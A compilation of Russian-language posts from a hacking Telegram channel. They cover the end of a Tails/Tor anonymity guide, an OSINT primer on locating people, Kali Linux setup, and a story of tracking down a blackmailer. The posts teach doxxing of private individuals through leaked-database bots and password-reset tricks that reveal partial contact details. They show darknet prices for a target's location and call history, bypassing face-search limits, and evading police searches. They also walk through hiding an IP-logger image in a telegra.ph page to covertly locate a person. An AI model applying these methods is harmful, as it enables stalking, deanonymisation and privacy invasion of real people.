Также, настоятельно рекомендую выключить JavaScript, хоть и сайты могут работать некорректно. Если в браузере найдут какой-то новый эксплойт, вы, скорее всего сможете обойти его стороной, потому что для выполнения практически всех вредоносных кодов чаще всего используется js. Сделать это можно двумя способами: расширение "NoScript", которое автоматически поставляется с браузером или же включение режима "Safest" — советую второе.

Настройки безопасности TOR Браузер

Подключение к RDP (опционально)

Если у вас есть дедик, вы можете использовать его как хранилище, чтобы не вводить все пароли каждый раз. Это все конечно круто, но учтите, используя дедик вы доверяете свою информацию третьему лицу, которое в любой момент может воткнуть вам палки в колёса. Всегда выбирайте порядочных хостеров! К сожалению, Tails не предусмотрела по умолчанию утилиту для коннекта по RDP, но мы сможем это исправить в одну строчку! Для этого откройте терминал и введите эту команду. (терминал находится в разделе "Utilities")

sudo apt update && sudo apt install remmina

В качестве подтверждения нас запросит пароль, который мы указывали при первом запуске — вводим его. После этого, можно будет обнаружить утилиту используя поиск. Вы можете корректировать настройки для более стабильной скорости, ни для кого не секрет, что ноды тора в основном под большой нагрузкой. Я советую установить кастомное разрешение экрана (800x600), глубину цветов — 8bpp. Учтите, что в выходные дни нагрузка намного выше.

Клиент Remmina

Почему мы не используем VPN?

Ответ прост: от них нет никакой пользы. Не верьте никому, никакой MullVad не спасёт вас, это централизованная сеть которая рано или поздно попадёт в руки спецслужб, если ещё не попала. Нужно ли пропускать трафик через посредника? Решать вам. Запомните, VPN — средство смены IP, шифрования трафика, обхода блокировок, но никак не анонимности. Наш мир работает абсолютно не так, как все привыкли его воспринимать, особенно Интернет пространство. Если у спецслужб нет доступа, они его откроют для себя даже втихую, нелегально. Привет, FBI, которое сидит в телефоне каждого жителя планеты Земля и считывает по звукам нажатия клавиатуры мой текст! К слову, обеспечивайте анонимность не только своего ПК, а и всего того, что его окружает. Наши материнки имеют закрытый код и в них, вероятно, может находиться backdoor, это уже было доказано на практике. Мыслите шире, если около вас лежит iPhone — забудьте в целом об анонимности. Я бы хотел выпустить полноценный гайд на 30 страниц, но оставлю эту идею для моего будущего YouTube канала=) Так вот, о нашей теме.. Tails блокирует все порты = VPN законнектить не получится. Единственный выход — открывать порты мануально, что уничтожит изоляцию системы под 0 и она потеряет свой смысл. Тут дело каждого.

Подводим итоги

Весь наш трафик проходит через WiFi соседа, наше устройство имеет сменный MAC и идентифицировать нашу личность будет сложно, потому что MAC не взаимодействовал с нашей личной сетью и не был занесён в базы провайдера. Используя децентрализованную сеть TOR мы получаем высокую степень защиты IP, с настройкой браузера — исключаем трекеры/инъекции разного типа. Если нашу систему смогут каким-то образом сфальсифицировать, злоумышленники смогут получить IP адрес соседа, который никак не связан с нами. Представим, что злоумышленники — воры, которые решили ограбить соседа. В таком случае они не смогут залезть в нашу квартиру/дом, а мы оперативно сможем посетить ближайший туалет и смыть нашу систему. Наши устройства абсолютно чисты, даже если ограбить попытаются нас, по недостатку улик воры закинут эту идею, подумывая что ошиблись адресом. Обычно на этом этапе закрываются все дела, потому что бумажки без доказательной базы — просто бумажки. Вы сможете обсуждать любой ход действий в нашем чате. Опять же упомяну, это не мануал по полной анонимности, это — база ~~криминального~~ мира, которая хорошо зарекомендовала себя временем. Всем мирного неба над головой!

НАШ КАНАЛ: t.me/hack2day

OSINT: Начало

2023-04-22T22:16:20.619Z

Приветствую. Многие меня просили написать статью о OSINT. Ребята, вместить всю информацию в одну статью будет крайне сложно, люди на такие темы пишут книги=) Мы попытаемся охватить основы, которые смогут дать общее понимание и базовые инструменты. Это очень интересная тема и она 100% ещё не раз будет раскрыта более детально в нашем канале. Если вы ещё не с нами — присоединяйтесь в наше сообщество. Так же, мы создали чат для общения!

ДИСКЛЕЙМЕР

Немного о OSINT

Сам по себе термин расшифровывается как "разведка на основе открытых данных", но зачастую этого мало. Хороший осинтер тот, кто умеет не только найти информацию из открытых источников, но и раздобыть её самостоятельно. Социальная инженерия очень важный компонент, без которого далеко вы не продвинетесь. Главная задача в этой сфере — максимально сократить круг поиска. Если нам известна страна, примерный возраст цели и имя — мы сократили круг с 8млдр. до ~10млн. Вся наша последующая задача будет состоять в том, чтобы найти любую зацепку, которая сможет сузить его сильнее. Это достаточно увлекательное занятие которое действительно затягивает. Так как я не скрываю свою личность, вы можете попрактиковаться даже на мне=)
Так вот, чтобы искать информацию, существует множество сервисов и методик, мы рассмотрим только главное и наиболее эффективное. Статья будет вашей методичкой которую я советую добавить в закладки, вы часто будете посещать эту страницу. Все действия будут показаны хаотично, потому что создать универсальный пошаговый список действий не является возможным, вы будете работать с разной информацией. Попросить помощи можно в нашем чатике.
p.S.: Стоит упомянуть, что наша цель — человек, хоть и осинтить можно всё.

Базовые правила

Я бы хотел вынести основные вещи, которые вы должны делать, чтобы получить максимальный результат. Первое: всегда записывайте и сохраняйте найденную информацию. Ваш поиск должен быть как пазл, вы собираете его по частям и в конце смотрите на картину. Порой, какой-то старый комментарий на форуме об автомобилях который вы сочли за мусор может стать той самой недостающей деталью. Также, делайте копии страниц используя SingleFile, не поленитесь и создайте папку под каждую цель, сохраняя в неё всю найденную информацию.
Второе: выжимайте соки с каждой зацепки, даже если мысль кажется бессмысленной. Если вы нашли соц. сеть цели, максимально взаимодействуйте с ней. Речь о восстановлении пароля с целью узнать последние цифры номера/часть мыла, поиска старых упоминаний/никнеймов и прочее, зависит от ситуаций. Если Instagram покажет нам последние 2 цифры номера, мыло покажет средние 3, этого уже вполне достаточно для сопоставления цепочки.
Третье: соблюдай конфиденциальность. Не используйте личные аккаунты поисковиков, личные telegram, которые можно связать с вашей личностью и прочее. Некоторые используют для регистраций личный email, оставляя везде свой цифровой след и тем самым подставляют свою задницу под очередной дамп, пополняя базы. Если ресурс вам не важен (второстепенные сайты для одноразового захода) — используйте одноразовое мыло. Если нужно сохранить доступ к ресурсу — создайте ящик на proton.me. И нет, это дерьмо абсолютно не анонимно, не слушайте идиотов, которые твердят вам это. Но для наших целей — в самый раз! Оно удобно тем, что не требует никаких SMS для регистрации.
В идеале ваш почтовый ящик должен выглядеть примерно вот так:
D5d5UM1R4iZiFA_{название сервиса}_86mWfFBed7dTN@proton.me

пример папки для Osint

Мультиинструменты

Эти инструменты вы должны использовать в первую очередь. Они предоставят нам базовую информацию, с помощью которой мы сможем начать рыть наш "туннель". Искать в них можно все что угодно: телеграм, почту, номер, юзернейм и пр. Главное: не пробивайте там самих себя! Это первая, казалось бы, банальная ошибка, но её очень часто совершают многие опытные ребята=)

1. UniversalSearch - умеет искать практически по любой информации. Бесплатен.
2. QuickLeak - старый, легендарный бот. Есть 2 бесплатных запроса. 10$/мес.
3. EyeOfGod - тот самый "Глаз Бога", в представлении не нуждается. 90р/день.
4. Himera - работает не только по "открытым источникам", один запрос = ~109р.

Я не стану расписывать возможности каждого, они все выполняют одну функцию, только по разным базам. Не вижу смысла делать огромный список, главные тулзы при правильном использовании отлично делают свою работу.

Социальная инженерия

Хотел выделить несколько строчек, потому что OSINT без использования СИ часто не выдаёт стоящего результата. Никогда не бойтесь общаться с целью, вы должны изучить её с ног до головы. Человек — это самая большая дыра в безопасности. Большинство преступлений раскрывается не из-за "продажного VPN", а из-за глупости особи за экраном. Я бы хотел показать вам кейс который мне показался забавным, но и в то же время неимоверно гениальным=)

пример социальной инженерии

Заметка: ".msi" файлы используются для установки приложений в среде Windows, этот тип так же как и ".exe" может вмещать в себе вредоносное П.О..

Это креативное занятие, которое в большинстве случаев требует индивидуального подхода к каждому человеку. Если вам интересно, обратите внимание на книгу "Социальная инженерия и этичный хакинг на практике (2022)". В ней описано множество методов атак, о которых вы, скорее всего даже и подумать не могли. К слову, об OSINT там тоже есть несколько толковых глав.
Прекрасное чтиво перед сном, рекомендую от чистого сердца!

Поисковики — главный инструмент

Эта та вещь, что специализируется на поиске. Им важно собрать как можно больше информации, чтобы составлять конкуренцию и завлекать аудиторию своими возможностями, это нам и нужно! По своему опыту могу сказать, что даже маленький, никому не нужный поисковик часто может выдать информации больше, чем гиганты. Поэтому, не стоит перебирать, все по своему хороши. Главное — правильно искать, чему сейчас мы и научимся. На примере у нас будет Google, но принцип работы практически везде ничем не отличается. Моделируем ситуацию: нам нужно произвести точный запрос по номеру телефона и отсеять другие похожие варианты. Для этого нам понадобится

сконструировать такой запрос, используя кавычки: "74952247069"

Заметка: если вы ищете информацию, которая относится к какой-то стране, (пример: номер телефона) вам следует включить VPN той же страны. Таким образом можно получить больше информации, геопозиция решает!

конкретизация поискового запроса

Нам покажет только 100%-тные упоминания. Речь может идти не только о номере, а о другой информации: email, username, пароль, ФИО и пр.
Но что если нам выкидывает кучу сайтов, которые не относятся к нашему запросу? Пример на скриншоте выше, речь о "кто звонил" и прочих. Мы также сможем исключить их по ключевых словах. Это может быть полезно, если у человека о котором вы пытаетесь узнать информацию есть однофамилец, и он занимается публичной деятельностью. Для этого нужно используя "-" написать популярные синонимы к возможным словам и выполнить запрос как ниже:

"74952247069" -звонил -узнать -информация -проверить

исключаем слова из поиска

Также существует сайт, который поможет вам сгенерировать правильный запрос для Google. Тут собраны все подобные методы, которые вы также можете использовать, чтобы добиться лучшего результата. Нажмите для перехода.

сайт для создания Google дорков

Как я и упоминал, нужно прогонять информацию в разных поисковиках. Я оставлю вам скромный список, но вы можете дополнить его написав мне в личные.

https://intelx.io/
https://searx.tiekoetter.com/
https://search.carrot2.org/
https://www.google.com
https://www.bing.com/
https://yandex.com/
https://duckduckgo.com/
http://boardreader.com/
http://www.dogpile.com/
https://search.creativecommons.org/
https://www.startpage.com/

Поиск по username

Некоторые пользователи используют один и тот же ник на сайтах, что поможет нам собрать больше информации. Для этой цели существует много ботов, но именно этот используется осинтерами больше всего: @maigret_osint_bot

поиск в боте Maigret

Как заявляют разработчики, поиск производится на 3.000 сайтах.
Бот может часто лежать, поэтому советую установить утилиту на которой он основан сразу к себе в машину. Таким образом поиск будет более точным, потому что прокси бота частенько залетают в ~~blacklist~~ и не сканируют должным образом.
Для этой цели также можно использовать поисковики, таким образом мы, вероятно, сможем получить кешированные страницы и просмотреть их копию.
Также не стоит забывать, что многие используют username в почте.
Есть бот, который переберёт почтовые домены в автоматическом режиме.
Его тоже можно установить себе на компьютер и сканировать эффективнее.

поиск почты используя MailCat

Заметка: попробуйте восстановить пароль от аккаунта на найденных сайтах. Вам с огромной вероятностью покажет часть почты/номера телефона.

Поиск по номеру телефона

Имея на руках номер, вы открываете себе возможность устроить полный шпионаж, все зависит от размера вашего кошелька, обговорим это ниже=)
Но что если весь ваш доход — карманные деньги от родителей? Не волнуйтесь, для вас тоже есть куча бесплатных возможностей. Например, можно воспользоваться сайтом, который хранит в себе терабайты русских утечек.
Для доступа нужно будет воспользоваться средствами смены IP, потому что власти не разделяют наши интересы и заблокировали ресурс=) Перейти на сайт.
Это самый мощный и бесплатный инструмент по России. Если вы заказывали еду, ваши адреса, скорее всего, дополняют базу данных, советую проверить.

поиск на сайте saverudata

Что делать если цель из другой страны? Попробуйте воспользоваться GetContact. Это приложение является огроменной базой информации о номерах, но ни в коем случае не устанавливайте это себе на личное устройство! Принцип его работы основан на том, чтобы добывать данные со своих пользователей.
Да-да, вы его установили и одновременно слили всю свою контактную книгу=)
Гениальный, коварный ход, но для наших целей является золотым звеном. Воспользуйтесь эмуляторами для того, чтобы не стать жертвой самостоятельно.

поиск Getcontact в эмуляторе

Существует бот, который производит поиск по базе GetContact. Перейти.
Бесплатно можно совершить 7 запросов, после: 10 запросов = 100 руб.

telegram бот для поиска по базе Getcontact

Для более глубокого результата, попробуйте добавить номер жертвы в Telegram/WhatsApp/Viber/Signal. Есть шанс получить фотографии & ФИО.
А что если у вас есть деньги? Тогда ваши возможности не ограничиваются, вы сможете узнать местоположение цели/историю звонков/паспортные данные и многое другое! Естественно, это противоречит законодательству многих стран и автор осуждает подобные методы добычи информации. Стоит упомянуть, что на 15/04/2023 начали закручивать гайки, сейчас рынок намного сократился, все DarkNet комьюнити наблюдают над ситуацией. Активные позиции все-таки есть, и я продемонстрирую вам скриншот, чтобы вы знали цену своим данным.
Ссылки не оставляю. Вспомните о чём статья и реализуйте свои навыки=)

теневые услуги и расценки

Поиск по Email

Мыло = ключ к всей информации, поэтому обязательно проверяйте его на утечки пароля. Для этого используются такие сервисы как: PasswordSearch, intelx, leackcheck. На самом деле их намного больше, но это одни из самых мощных.

результат проверки почты на утечки

Также существует сервис, который найдёт соц. сети по email — Seon. Он бесплатен, имеет приятный вывод информации и не требует авторизации.

поиск соц. сетей используя Seon

Поиск по лицу

Для этой задачи я использую PimEyes. Превосходный сервис который предоставляет нам 3 бесплатные попытки в 24ч., но посредством смены IP&FingerPrint можно легко обойти это ограничение и пользоваться без ограничений. К слову, регистрация не требуется. На все найденные изображения прилагается источник. Это действие может быть полезно для дополнительного сбора информации, когда мы уже имеем на руках фотографию цели.

результат поиска в PimEyes

Так же есть неплохой аналог — Search4Faces, он тоже бесплатен, но ищет по соц. сетям. Я заметил что его результаты в некоторых ситуациях слегка лучше, поэтому, в идеале использовать оба сервиса для лучшего исхода.

результат поиска в search4faces

Итоги

В этой статье я затронул только самое-самое основное, но этого достаточно, чтобы начать свой путь. Как я и упоминал, OSINT — очень увлекательная сфера, которая ещё не раз будет на нашем канале, но в других направлениях=) Если у вас есть какие-то дополнения/интересные сервисы, сообщите мне в личные, я добавлю их в следующий материал. Всем здоровья и мирного неба над головой!

НАШ КАНАЛ: t.me/hack2day

Kali Linux: готовим систему после установки на VM к работе.

2023-04-13T20:23:34.713Z

Приветствую. В прошлой части мы выполнили установку Kali Linux на виртуальную машину. Сегодня же, мы установим несколько важных утилит, которые нам 100% придётся использовать в дальнейшем. Выучим на практике много новых команд, затронем кастомизацию системы и сделаем ещё один огромный шаг вперёд. Приятного ознакомления!
Не забывайте подписываться на наш канал и вступать в чатик.

↓↓↓
ПОДПИСАТЬСЯ | ВСТУПИТЬ В ЧАТ

Базовое обновление пакетов

Kali с печки не устанавливает/обновляет утилиты, чтобы сделать установочный образ наиболее лёгким по весу. Это действие нужно проделывать каждому, кто только установил Kali. Впишите эту команду в терминал:

sudo apt update && sudo apt upgrade

У вас запросит пароль от учётной записи, который мы указывали при первом запуске. Это будет происходить всегда, когда мы захотим использовать команду "sudo". Она выполняет действия на системном уровне и требует авторизации.
Кстати, ввод пароля "слепой", вы не будете видеть вводимые символы.
У вас, скорее всего, запросит подтверждение на установку. На этом моменте нужно написать в терминале букву "y" и нажать "Enter". (y=yes, n=no)

Двойной амперсанд (&&) используется для запуска нескольких задач в одной строке. В данном случае, мы обратились к системе и сказали ей: слушай, сначала посмотри что у меня вообще установлено, проверь, есть ли на него новые обновления. Если что-то нашлось — обнови самостоятельно.

выполнение команды для обновления пакетов

Кастомизация

Kali — сам по себе очень красивый дистрибутив, но иногда хочется сделать систему уникальной, более приятной для глаз. Это абсолютно не проблема, ведь существуют тысячи различных кастомизаций. Пользователи создают их самостоятельно и делятся ими на различных сайтах. Как пример: нажимайте=)
Тут вам и аниме девочки, и копии Windows для тех, кому сложно привыкнуть..
Да проще назвать то, чего там нет! К сожалению, я не смогу показать процесс установки тут, но оставлю вам достойный видеоролик, на котором пошагово демонстрируется процесс. https://www.youtube.com/watch?v=NRDqNjKsU0w

скриншот сайта с пользовательскими интерфесами xfce

Установка MullVad VPN (.deb приложений)

VPN — неотложная часть, ведь при сканировании сеток/сайтов и прочего, наш настоящий IP с большой вероятностью попадёт в backlist/будет кидаться капчей. Я использую MullVad и этом примере покажу, как его установить. При переходе на сайт нас встречают кнопки загрузки. Нам нужно выбрать, какой тип файла нам больше подходит, ".deb" или ".rpm". Для систем на Debian (Kali относится к ним) нужно выбирать расширение ".deb", нам подходит этот вариант.

Заметка: тип файла ".deb", практически тоже самое, что и ".exe" в Windows. Его используют для установки приложений в среде Linux.

загрузочная страница MullVad

После полной скачки файла нам нужно открыть терминал и перейти в папку, где находится наш скачанный файл. Это делается командой "cd". К примеру, обычная папка с браузерными загрузками называется "Downloads" и чтобы перейти в неё с помощью терминала, нужно выполнить такую простую команду: cd Downloads/
Написали? Теперь можно проверить, туда ли мы попали. Для этого существует самая простенькая команда — "ls". Она покажет все файлы в папке, в которой мы сейчас находимся. Я обнаружил файл который мы качали, а это значит что все получилось, можно переходить к установке приложения.

Совет: вы можете нажимать "TAB" и вам будут предлагать возможные названия папки/файла, это очень удобно и будет часто использоваться вами.

команды в терминале

Для установки любого ".deb" приложения используйте эту команду:

sudo dpkg -i app.deb

Вместо "app.deb" — название вашего приложения. В моём случае это длинное название MullVad, которое я ввожу используя клавишу "TAB" для быстроты.
Так как мы использовали команду "sudo", нам нужно ввести наш пароль.
После этого в терминале начнётся установка, а у нас появится приложение.
Найти его можно нажав на иконку в верхнем левом углу. (скриншот прилагаю)

Заметка: команда "sudo" выполяет команду используя режим "суперпользователя", вы будете часто её использовать при работе с Linux.

проверка наличия приложения в поисковом меню

Полная "TOR`ификация" трафика

Когда нужно укрепить защиту для визита какого-то места, нам потребуется воспользоваться TOR. Многие не знают, но это не просто браузер.
Это целая сеть, через которую можно пропустить весь трафик, она даст нам больше свободы и уверенности в Интернете. Есть далеко не один способ как это сделать, но я покажу один из самых лёгких. Сразу скажу, полностью доверять
не стоит, каким-то образом может что-то слететь, поэтому, используйте VPN c включенной функцией "KillSwitch" чтобы наш основной IP не утёк. К слову, я ранее не замечал каких-то "внезапных слётов", но перестраховаться нужно. Для установки мы выучим новую команду — "git". Она в основном используется для скачки утилит из GitHub, (простыми словами) должна быть установлена в системе по умолчанию после обновлений всех пакетов. (первый шаг)
Для установки & запуска TOR пропишите эти команды в терминале:

git clone https://github.com/ruped24/toriptables2 cd toriptables2/ sudo mv toriptables2.py /usr/local/bin/ cd toriptables2.py -h

Немного описания: "git clone" скачала утилиту через GitHub, команда
"cd toriptables2" зашла в папку со скачанной утилитой. Далее идёт шаг перемещения, с папки в которой сейчас находимся (в нашем случае "toriptables2") перемещается файл "toriptables2.py" в "корневую" директорию всех установленных утилит, чтобы мы могли использовать запуск скрипта с любого места. Команда "cd" без какой-либо папки перенесёт нас в "базовое местоположение", в котором мы по умолчанию находимся после запуска терминала. Далее идёт запуск скрипта, который покажет нам меню с описанием функционала. (из-за атрибута -h, = -help)

Итак, по итогу мы должны увидеть такое меню с описанием команд:

toriptables2 - описание команд

Как вы уже поняли, если сменить атрибут нашей команды с "-h" на "-l", оно подключит нас к сети TOR. Давайте это и сделаем. Я ввожу такую команду:

toriptables2.py -l

После этого нужно ввести пароль, потому что для действия нужны системные права. По итогу подключение удалось, результат можно узреть на скриншоте:

Совет: "KillSwitch" — это функция для блокировки трафика, если VPN "слетел". Если у вас есть возможность включить это — даже не задумывайтесь, делайте.

успешное подключение

Клиент для RDP/SSH

По умолчанию нам не предоставили удобный клиент для подключения по rdp/ssh, поэтому, установим его самостоятельно. Я уже несколько лет использую Remmina и ни разу не столкнулся с проблемой. Имеются очень гибкие настройки под наши "тёмные" дела, описать каждый пункт = потратить пол дня. Для установки нам потребуется написать всего лишь одну команду:

sudo apt install remmina

После установки инструмент можно будет найти в списке утилит. Если вы работаете через сеть TOR, можно максимально оптимизировать скорость соединения: от смены качества изображения до отключения ненужных функций.

Заметка: SSH используют для удалённого доступа к серверу, по умолчанию работает на порте "22". Он не имеет графического интерфейса, (без дополнений) чаще используется на серверах Linux, хоть и пригоден для любой другой ОС.

Заметка #2: RDP/Дедик работает на порте "3389". Этот протокол используют только для подключения к серверам на Windows. Имеет графический интерфейс.

Remmina: команда установки & результат

FileZilla — FTP Клиент

Когда мы узнали данные от *нашего* сервера, нам нужно использовать какую-то утилиту для взаимодействия с ним. Сейчас их появилось просто уйма, но мой выбор падает на FileZilla. Это самый легкий и понятный клиент для подключения к сервакам по протоколу FTP. Как мы заметили, устанавливать приложения в Linux можно в одну строчку, это даже удобнее, чем на Windows.
Введите эту команду в терминал для установки:

sudo apt install filezilla

Как всегда, несколько секунд ожидания и мы можем запускать утилиту.

Заметка: протокол FTP работает на порту "21" и используется для передачи файлов / доступа к удалённым хостам. SSH считают безопасней для этих целей.

интерфейс FileZilla

Итоги

Мы установили базу, от которой в дальнейшем оттолкнёмся. Я думаю, это был действительно полезный урок, ведь мы освоили много новых команд. У меня стоит цель объяснить вам материал на понятном языке, порой, это сложно. Надеюсь, все было понятно, но если нет — вы всегда сможете задать вопрос в нашем ламповом чате: https://t.me/hack2day_chat. Всем здоровья и мирного неба!

НАШ КАНАЛ: t.me/hack2day

Установка Kali Linux на VM

2023-04-04T19:12:02.954Z

Приветствую подписчиков нашего канала. Мы с вами прошли много теории, изучили основную базу и готовы переходить на следующий этап — Linux. Это по настоящему мощнейший инструмент и я предполагаю, вам будет интересно попробовать поработать с ним. Немного о том что мы будем делать в дальнейшем: "пентест" камер частных домов, "пентест" сайта с дальнейшей выгрузкой базы данных (те самые дампы) и их расшифровка, попробуем получить доступ к серверам крупнейших команд на форумах, проверим сервера на стойкость атаками DDOS. И это только начало! Я буду пытаться максимально просто выражать информацию для каждого новичка и предполагаю, мы образуем своеобразный круг людей с одинаковыми интересами в котором будем обмениваться информацией или вовсе объединимся в "белую группировку".
Приятного ознакомления, если ты ещё не с нами, подписывайся!

Что такое Kali Linux и зачем он?

Расскажу по-простому: Linux — операционная система, на которой базируются разные кастомные оболочки. Вы наверняка видели "сборки" Windows у которых был упор на оптимизацию, приватность, различные дополнения. Так вот, в основном они созданы каким-либо сообществом. В Linux тоже имеются "сообщества", которые делают дистрибутивы под разные цели. Я выбрал именно Kali из-за разнообразия утилит. Система подходит под большинство целей, которые нас интересуют + максимально проста в восприятии новичка. Проще говоря, это оболочка с уже готовым арсеналом инструментов, нам не потребуется создавать велосипед. Имеет открытый код, полностью бесплатна.

Интерфейс Kali Linux (GNOME Shell)

Куда его ставить?

Скачайте и установите VirtualBox. Я не советую накатывать новичку Linux в качестве основной системы, вы просто сойдёте с ума. На виртуальной машине можно запускать его в любое время в качестве второстепенной системы. Альтернативный вариант: установка на съемный накопитель. (флешка) Мы рассмотрим этот метод в другой раз и накатаем систему, которую будет легко ~~смыть в туалете при обыске~~ использовать в любом месте, где есть доступ к ПК.

Интерфейс VirtualBox

Установочный мануал

Мы определились что будем использовать систему на VM (виртуальной машине), осталось только скачать и установить сам Kali. Для этого перейдите на страницу загрузки и выберите "Virtual Machine" --> "VirtualBox64". Есть несколько вариаций загрузки: Torrent, прямая загрузка с серверов. Я выберу первый вариант. Файл занимает 2.7GB, но нам потребуется выделить больше места.

Загрузочная страница Kali Linux

После скачки у нас будет архив, который содержит в себе два файла. Нам нужно распаковать все содержимое в любую удобную для вас папку. (её нельзя будет удалять в дальнейшем) Запустите файл с расширением ".vbox" и вы увидите, как в VirtualBox появится новая система под названием "kali-linux-2023..", запустите её кнопкой "Start". Установка произойдёт автоматически, буквально минута времени и все готово к использованию. Если вам показалось что есть небольшие пролагивания, можно выделить больше ресурсов в настройках VirtualBox. Я выделил 4GB ОЗУ, 128MB Видеопамяти, 3 CPU.Хоть и потребление в среднем не превышает и 50% того, что я предоставил. Ну да ладно, пусть будет.

Первый запуск

При первоначальном запуске нас потребует ввести аутентификационные данные.
Стандартный login/password: kali:kali. Мы сможем изменить его в дальнейшем.

Авторизация Kali Linux

Давайте произведём одно из важных действий: обновление пакетов. Откройте терминал и пропишите эту команду: sudo apt update && sudo apt upgrade
Таким образом мы проверим наличие обновлений, если они вышли — установим.

Терминал находится в левом верхнем углу и выглядит как чёрный квадрат.
(см. скриншот, выделено стрелочкой)

Чтобы вставить/скопировать текст в терминале, используйте: CTRL + Shift + V/C.

Двойной амперсанд (&&) используется для запуска нескольких задач в одной строке. В данном случае, мы обратились к системе и сказали ей: слушай, сначала посмотри что у меня вообще установлено, проверь, есть ли на него новые обновления. Если что-то нашлось — обнови самостоятельно.

Обновление пакетов

Если у вас запросит пароль для этого действия, введите "kali". Процесс долгий, во время обновлений можно порыться в менюшке и ознакомиться с утилитами. Если запрашивают ваше соглашение на установку, вводите в терминал букву "y".

Буква "y" воспринимается за слово "yes", его антоним — "n", который читается системой как "no" и обозначает отказ от какого-то действия.

После обновления можно выдохнуть, ведь первый шаг сделан. Я не хочу учить вас в виде книги с кучей ненужных терминов, которую нужно заучить. Мы будем получать опыт на практике, постепенно, но уверенно. На данный момент наша система готова к последующим манипуляциям, которые мы будем совершать в последующих статьях. Благодарю за прочтение, всем здоровья и мирного неба!

НАШ КАНАЛ: t.me/hack2day

Как мы нашли и наказали шантажиста

2023-03-28T21:27:01.982Z

ДИСКЛЕЙМЕР

Статья несёт образовательный характер. Мы не поощряем никакую нелегальную деятельность. Все персонажи вымышлены, совпадения с реальностью случайны. Статья написана и опубликована используя искусственный интеллект!

Приветствую! Как часто вы сталкивались с мошенниками, вымогателями и прочей нечистью? Давайте будем честны, полиция не особо интересуется подобными личностями, именно это и движет их совершать преступления. Уровень жизни в СНГ странах желает лучшего, легальные работы не оправдывают несколько потраченных лет обучения в университете. Многие личности переходят "границы" закона, пытаясь получить много за краткий срок. Но не в нашу смену! Сегодня мы найдём вымогателя и он заплатит цену больше, чем требовал. Приятного чтения!

С чего все началось

Несколько дней назад мне пришло сообщение от некого пользователя, который был известен своими "деанонами". Проще говоря, мне скинули какие-то данные и вымогали 2 ETH за "свободу", в случае отказа эти данные должны были посетить отделение полиции. Так как я не замешан ни в какой нелегальной деятельности, мне было абсолютно плевать, тем более информация не имела ничего общего со мной. Спустя несколько дней я увидел тему на форуме, в которой люди обсуждали эту личность. Как оказалось, написал он не только мне и некоторые пользователи действительно заплатили ему за "свободу" во избежания неприятностей. С того момента у меня стояла цель: найти и наказать вредителя, чтобы больше никто не пострадал от его действий. И у меня вышло!

пример его угроз

Базовый сбор информации

Все, что у нас есть на эту особь: никнейм в телеграм, приблизительный возраст по стилю письма. (около 14-ти лет) Из этих данных мы должны подарить вредителю инфаркт, не густо, правда? Так как мы имеем никнейм, можно попробовать поискать его аккаунты в других соц. сетях. Для этого воспользуемся сервисом @maigret_osint_bot, который ищет совпадения на 3000 сайтах.
Такой результат мне удалось получить используя бота:

информация с maigret

К сожалению, вся эта информация не имела ничего общего с нашим вредителем, в основном все эти личности — иностранцы, которые использовали такой же никнейм. Поэтому, перейдём к следующему шагу: Глаз Бога. Это бот, который хранит информацию с утечек и умеет найти практически любого человека. Перейти: https://eyeofgod.pro/. Я смог обнаружить прошлый никнейм, который существенно поможет нам в дальнейшем поиске.

информация с Глаза Бога

Вбив прошлый никнейм в поисковики (DuckDuckGo, Yandex, Google) я смог найти потенциальный аккаунт в Instagram. Скорее всего, он использовался для поиска информации / угроз жертвам. Так как аккаунт уже удалён, я покажу образец:

образец его профиля Instagram

Это весомая находка, ведь мы сможем узнать часть почты / номера телефона. Для этого нам нужно перейти на главную страницу Instagram и нажать "Забыл пароль". После ввода юзернейма нас уведомляют, что SMS с дальнейшими действиями отправлено на номер "+7 *** *** **38". Начало положено! Теперь нужно включать навыки соц. инженера и переходить к общению.

неполный номер телефона

Попытка получить IP #1

Айпи нам нужен для того, чтобы ~~шантажировать походом в полицию~~ сверить информацию. Так как мы не прощупали навыки нашего вредителя, зайдём "с козырей" — скинем логгер напрямую. Логгер используют для того, чтобы узнать информацию об устройстве по ссылке. Речь идёт о примерном местоположении, модели телефона, интернет провайдере, браузере и прочих деталях.
Я создал его на сайте iplogger.org и замаскировал под профиль VK,
используя стандартную гиперссылку в Telegram. (CTRL + K)

видоизменяем ссылку в tg

К сожалению, это не прокатило. При нажатии на ссылку выходило предупреждение о том, что она ведёт не туда, куда написано. Думаю, именно это спугнуло шантажиста. Поэтому, замаскируем её в доверенном сайте!

Первая попытка узнать IP, которая была неудачной

Попытка получить IP #2

В этот раз мы внедрим наш логгер прямо в сайт, чтобы не возникало никаких сомнений. По сути, человек переходит на условный "telegra.ph", но внутри сайта подгружается картинка из нашего источника. Прямо сейчас я мог бы "подгрузить" скриншот из этой статьи используя картинку-логгер и узнать информацию о вас. Выбор "telegra.ph" не случаен, ведь при отправке ссылки с этого сайта Telegram создает кнопку "Посмотреть", по сути даже не нужно ничего открывать в браузере, все происходит в один клик. Пример можно увидеть ниже.

пример кнопки "Посмотреть"

Давайте перейдём к делу! Приманкой я выбрал "деанон" на шантажиста, чтобы он 100% открыл нашу заготовку. Делаем аккаунт на этом сайте и ищем любую картинку. Копируем её адрес и создаем "IP Tracker" используя сайт. Домен выбираем любой, это не повлияет. Самое главное: расширение ссылки .png!
Правильную настройку можно увидеть на скриншоте ниже:

создание картинки-логгера

Можно включить некоторые пункты для определения GPS, но в моем случае нужно действовать осторожно, поэтому, чтобы не вспугнуть его, я не рисковал.
Далее заходим на telegra.ph и создаем новый пост. Внутри можем писать что угодно, наша цель: указать ссылку на логгер. У меня получилось вот так:

P.S.: Если у вас не появляется картинка после ввода ссылки, нажмите "Enter".

Как мы видим, вместо страшной ссылки у нас появилась картинка. Но не простая! Теперь каждый кто посетит нашу запись на telegra.ph будет отслеживаться. Таким образом мы попытаемся заставить перейти вредителя на чистый сайт в котором будет грязная нагрузка. И у нас получилось! Он даже ничего не заподозрил.

удачная попытка узнать IP

Тем временем, мы получаем 2 новые строчки на сайте, которые гласят, что некий абонент предположительно с Краснодара открыл нашу картинку. Проверка айпи на Прокси/VPN/Дедик показала, что он чистый. Провайдер, как я понял, хостит только Краснодар, поэтому, в городе можно быть уверенным на 100%.

информация с полученного перехода

СИ.: Получаем полный номер

